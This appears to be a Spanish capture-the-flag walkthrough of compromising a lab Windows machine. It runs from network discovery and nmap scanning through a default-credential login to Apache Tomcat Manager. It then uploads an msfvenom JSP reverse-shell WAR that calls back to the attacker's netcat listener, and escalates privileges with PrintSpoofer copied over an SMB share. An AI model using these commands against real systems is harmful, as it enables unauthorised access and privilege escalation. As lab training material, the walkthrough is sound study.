Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Victima: 10.0.2.69
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:
$ ping -c 1 10.0.2.69
Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows.
A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:
$ nmap -Pn -p- 10.0.2.69 -sVC
Como podemos comprobar la Máquina Victima tiene abiertos los puertos 135, 139, 445, 5040, 7680, 8080, 49664, 49665, 49666, 49667, 49668, 49669 y 49670.
Comprobamos que es lo que corre por el puerto 8080.
Corre un Apache Tomcat, le damos a la opción Manager App.
Nos encontramos con un login, probamos con credenciales por defecto.
Conseguimos acceder con las credenciales admin:tomcat, además nos da la opción de poder subir un archivo .war.
A continuación, con la ayuda de la herramienta msfvenom nos creamos una reverse shell JSP (JavaServer Pages), para ello ejecutamos el siguiente comando:
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.2.4 LPORT=4443 -f war -o reverse.war
Una vez creada la reverse shell, la subimos.
En nuestra terminal de nuestra Máquina Atacante y con la ayuda de la herramienta de netcat (nc) nos ponemos a la escucha por el puerto 443 por donde vamos a recibir la conexión, para ello ejecutamos el siguiente comando:
$ nc -lvnp 4443
Ejecutamos el exploit pinchando en el nombre de nuestra reverse shell.
Obtenemos una shell.
Identificamos la versión del Sistema Operativo, para ello ejecutamos el siguiente comando:
c:> systeminfo
Identificamos los privilegios, para ello ejecutamos el siguiente comando:
c:> whoami /priv
Tenemos el privilegio SeImpersonatePrivilege activado, siendo este un privilegio de Windows que otorga a un usuario o proceso la capacidad de suplantar el contexto de seguridad de otro usuario o cuenta, por lo tanto, nos descargamos la herramienta PrintSpoofer para explotar este privilegio.
Nos pasamos el ejecutable a la Máquina Victima a través del protocolo SMB (445) con la ayuda de la herramienta impacket-smbserver, para ello desde nuestra Máquina Atacante en el directorio donde se encuentra descargada la herramienta ejecutamos el siguiente comando:
$ impacket-smbserver share $(pwd) -smb2support
En la Máquina Victima nos descargamos la herramienta, para ello ejecutamos el siguiente comando:
c:\..\Temp> copy \\10.0.2.4\share\PrintSpoofer.exe PrintSpoofer.exe
Ejecutamos la herramienta en la Máquina Victima, para ello ejecutamos el siguiente comando:
c:\..\Temp> .\PrintSpoofer.exe -i -c cmd